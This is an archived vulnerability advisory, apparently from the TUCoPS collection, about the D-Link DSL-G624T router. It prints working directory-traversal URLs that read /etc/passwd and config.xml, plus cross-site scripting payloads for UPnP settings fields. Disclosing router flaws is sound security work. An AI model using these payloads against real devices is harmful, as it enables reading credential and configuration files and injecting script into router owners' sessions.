TUCoPS :: Network Appliances :: b06-5383.htm

D-Link DSL-G624T several vulnerabilities
D-Link DSL-G624T several vulnerabilities
D-Link DSL-G624T several vulnerabilities



D-Link DSL-G624T ADSL Router is vulnerable to several securities.

Directory transversal
http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd 

http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml 

Cross Site Scripting
Url:: http://router/cgi-bin/webcm 
Method:: POST
Variable:: upnp%3Asettings%2Fstate
Value:: >">alert(20102006)%3B

Url:: http://router/cgi-bin/webcm 
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: >">alert(20102006)%3B

Url:: http://router/cgi-bin/webcm 
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: "+onmouseover="alert(20102006)


Directory listing
Is possible to list the /cgi-bin directory

Tested on D-Link DSL-G624T
Version: Firmware Version : V3.00B01T01.YA-C.20060616 

Discovered by:  	 

Jos=E9 Ram=F3n Palanco: jose.palanco(at)eazel(dot).es

http://www.eazel.es 

Original advisory:
http://www.eazel.es/advisory005-D-Link-DSL-G624T-directoy-transversal-xss-cross-site-scripting-directory-listing-vulnerabilities.html 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH